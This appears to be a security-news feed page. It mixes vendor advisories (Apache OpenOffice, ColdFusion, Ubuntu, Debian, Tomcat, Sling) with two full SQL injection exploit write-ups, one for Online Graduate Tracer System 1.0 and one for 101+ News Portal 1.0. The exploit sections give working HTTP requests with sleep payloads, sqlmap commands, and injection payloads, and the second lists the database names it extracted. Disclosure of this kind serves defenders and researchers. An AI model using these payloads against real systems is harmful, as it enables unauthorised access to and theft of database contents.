Online Graduate Tracer System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Graduate Tracer System - Multiple SQLi# Date: 24/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the fill-in forms of Online Graduate Tracer System allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "age" parameter. ## Request PoC```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```This request causes a Fatal error. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "age" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 10 command works. ```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'%2b(select*from(select(sleep(10)))a)%2b'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/sts]└─# sqlmap -r sqli.txt -p 'age' --batch --dbs --level=3 --risk=2---snip---[01:53:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'POST parameter 'age' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 630 HTTP(s) requests:---Parameter: age (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: fullname=TKeljbcD&age=24' RLIKE (SELECT (CASE WHEN (6534=6534) THEN 24 ELSE 0x28 END)) AND 'ATRa'='ATRa&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 9933 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(9933=9933,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PwMK'='PwMK&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 7274 FROM (SELECT(SLEEP(5)))gxIn) AND 'maqj'='maqj&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=---[01:53:50] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)---snip---```## The "barangay", "batch", "company", "country", "course", "cs", "dob", "email", "estatus", "facebook", "fullname", "income", "location", "mincome", "municipal", "nature", "number", "organization", "phonenumber", "profession", "province", "region", "relate", "religion", "sex", "sreason", "status", "street", "twitter", "type" and "zipcode" parameters in the POST requests are also vulnerable. They can be exploited in the same way.

Online Graduate Tracer System 1.0 SQL Injection

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution.

CVE-2022-47502

Apache OpenOffice Advisory

**Macro URL arbitrary script execution without warning**

**Fixed in Apache OpenOffice 4.1.14**

**Description**

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose.Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution.

**Severity: Critical**

There are no known exploits of this vulnerability.  
A proof-of-concept demonstration exists.

Thanks to the reporter for discovering this issue.

**Vendor: The Apache Software Foundation**

**Versions Affected**

All Apache OpenOffice versions 4.1.13 and older are affected.  
OpenOffice.org versions may also be affected.

**Mitigation**

Install Apache OpenOffice 4.1.14 for the latest maintenance and cumulative security fixes. Use the Apache OpenOffice download page.

**Acknowledgments**

The Apache OpenOffice Security Team would like to thank Altin Thartori (tin-z) for discovering and reporting this attack vector.

**Further Information**

For additional information and assistance, consult the Apache OpenOffice Community Forums or make requests to the users@openoffice.apache.org public mailing list.

The latest information on Apache OpenOffice security bulletins can be found at the Bulletin Archive page.

Security Home\-> Bulletin\-> CVE-2022-47502

CVE-2022-47502: CVE-2022-47502

Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to run arbitrary Java code from the current directory.

CVE-2022-38745

Apache OpenOffice Advisory

**An empty class path may lead to run arbitrary Java code**

**Fixed in Apache OpenOffice 4.1.14**

**Description**

Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to run arbitrary Java code from the current directory.

**Severity: Moderate**

There are no known exploits of this vulnerability.  
A proof-of-concept demonstration does not exist.

Thanks to the reporter for discovering this issue.

**Vendor: The Apache Software Foundation**

**Versions Affected**

All Apache OpenOffice versions 4.1.13 and older are affected.  
OpenOffice.org versions may also be affected.

**Mitigation**

Install Apache OpenOffice 4.1.14 for the latest maintenance and cumulative security fixes. Use the Apache OpenOffice download page.

**Acknowledgments**

The Apache OpenOffice Security Team would like to thank the European Commission's Open Source Programme Office for discovering and reporting this attack vector.

**Further Information**

For additional information and assistance, consult the Apache OpenOffice Community Forums or make requests to the users@openoffice.apache.org public mailing list.

The latest information on Apache OpenOffice security bulletins can be found at the Bulletin Archive page.

Security Home\-> Bulletin\-> CVE-2022-38745

CVE-2022-38745: CVE-2022-38745

Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in Arbitrary file system read. Exploitation of this issue does not require user interaction, but does require administrator privileges.

Security updates available for Adobe ColdFusion | APSB23-25

Adobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve critical and important  vulnerabilities that could lead to arbitrary code execution and memory leak.

Adobe is aware that CVE-2023-26360 has been exploited in the wild in very limited attacks targeting Adobe ColdFusion.

Adobe categorizes these updates with the following priority rating and recommends users update their installations to the newest versions:

Adobe recommends updating your ColdFusion JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.  See the relevant Tech Notes for more details. 

Adobe  also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.    

*   ColdFusion 2018 Auto-Lockdown guide   
*   ColdFusion 2021 Lockdown Guide

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Patrick Vares (ELS-PHI) - CVE-2023-26359  
    
*   Charlie Arehart and Pete Freitag - CVE-2023-26360  
    
*   Dusan Stevanovic of Trend Micro - CVE-2023-26361  
    

**ColdFusion JDK Requirement**

**COLDFUSION 2021 (version 2021.0.0.323925) and above**

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

**COLDFUSION 2018 HF1 and above**  

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

March 14, 2023: Vulnerability Impact revised for CVE-2023-26360

For more information, visit https://helpx.adobe.com/security.html , or email PSIRT@adobe.com

CVE-2023-26361: Adobe Security Bulletin

Ubuntu Security Notice 5942-2 - USN-5942-1 fixed vulnerabilities in Apache HTTP Server. This update provides the corresponding update for CVE-2023-25690 for Ubuntu 16.04 ESM. Lars Krapf discovered that the Apache HTTP Server mod_proxy module incorrectly handled certain configurations. A remote attacker could possibly use this issue to perform an HTTP Request Smuggling attack.

==========================================================================  
Ubuntu Security Notice USN-5942-2  
March 22, 2023

apache2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Apache HTTP Server could allow unintended access to network services.

Software Description:  
- apache2: Apache HTTP server

Details:

USN-5942-1 fixed vulnerabilities in Apache HTTP Server. This update  
provides the corresponding update for CVE-2023-25690 for Ubuntu 16.04 ESM.

Original advisory details:

  Lars Krapf discovered that the Apache HTTP Server mod_proxy module  
  incorrectly handled certain configurations. A remote attacker could  
  possibly use this issue to perform an HTTP Request Smuggling attack.  
  (CVE-2023-25690)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   apache2                         2.4.18-2ubuntu3.17+esm10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5942-2  
   https://ubuntu.com/security/notices/USN-5942-1  
   CVE-2023-25690

Ubuntu Security Notice USN-5942-2

When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.

**Apache Tomcat vulnerable to Unprotected Transport of Credentials**

Moderate severity GitHub Reviewed Published Mar 22, 2023 to the GitHub Advisory Database • Updated Mar 22, 2023

GHSA-2c9m-w27f-53rm: Apache Tomcat vulnerable to Unprotected Transport of Credentials

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-28708

Debian Linux Security Advisory 5376-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5376-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 20, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : apache2CVE ID         : CVE-2006-20001 CVE-2022-36760 CVE-2022-37436 CVE-2023-25690                 CVE-2023-27522Multiple vulnerabilities have been discovered in the Apache HTTP server,which may result in HTTP response splitting or denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 2.4.56-1~deb11u1.We recommend that you upgrade your apache2 packages.For the detailed security status of apache2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/apache2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQYqdQACgkQEMKTtsN8TjYWeQ//dwKUtLc9oKmjEmiY1QsRsSYdlzMTWA8ow63vdtGD1QU3Xb/CxPSZ22Oh8zypNP5qtk3m11JA7npd7RNPpF3Gb1V5ebIlKP7GavGBIrGOmvH31hV3IUP4HoXO/mC36BA3twAgyF12HMtdPvj+qaNguYnxXhc02Kt7kl6sq+ybtdCnRnBfJJ2KYXKqtjRedc+HJZa0gSuq9fsFbaQF1OPk1jHEO/ixHhISKhEr1mHO+eLN3soQ9gqaEG/a/0jLUm1ThiBNeK5jkmCXuIuqwwrGHG16Cl9fIKGps1Yb+ef2aJca7onA4IfyUj1d1S7VmCgFFQe+5eAgdcR77mWS8RyEP/lyItY+ifzGG6xR0EUnDgD7ApcqhZBIJCgU583Dle+sjvwgb9iSSeNwynqx58Pf4648AJSx6nNlsop4ekE4To5GvKyr/eI3HNqat9BfVtwqRu4GnnurvJFzh5n2wpRl1JbQMFMx/kxb1He5ioayRtru9guViNA3ylgnd7lbk8FEsvvzS9MM0RVivlWdzD6+FVFHaWoCcwzv+0dFD6iiG5MJMGUr0pElw+juAs6bnKCCoEHU4HK0rKHlVeB6E3Ch7yF+b6PvzZqCqcOE6RB5/I2Nu9S3L78cZWRUnKXf/WHf3Lw+DCB8QKWUBuo0WjkFjmEe/oUCWHGt/UbtXGbSM+E=Bi/w-----END PGP SIGNATURE-----

Debian Security Advisory 5376-1

Excessive Iteration vulnerability in Apache Software Foundation Apache Sling Resource Merger. This issue affects Apache Sling Resource Merger: from 1.2.0 before 1.4.2.

**Apache Sling Resource Merger has Excessive Iteration vulnerability**

High severity GitHub Reviewed Published Mar 20, 2023 to the GitHub Advisory Database • Updated Mar 20, 2023

GHSA-rwrx-x2hw-9h5w: Apache Sling Resource Merger has Excessive Iteration vulnerability

101+ News Portal version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: 101+ News Portal - SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "searchtitle" parameter. ## Request PoC```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "searchtitle" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/multi]└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2                                           ---snip---POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:---Parameter: searchtitle (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- ----[18:01:02] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[18:01:02] [INFO] fetching database namesavailable databases [5]:[*] information_schema[*] mysql[*] newsportal[*] performance_schema[*] phpmyadmin---snip---```

Tag

#apache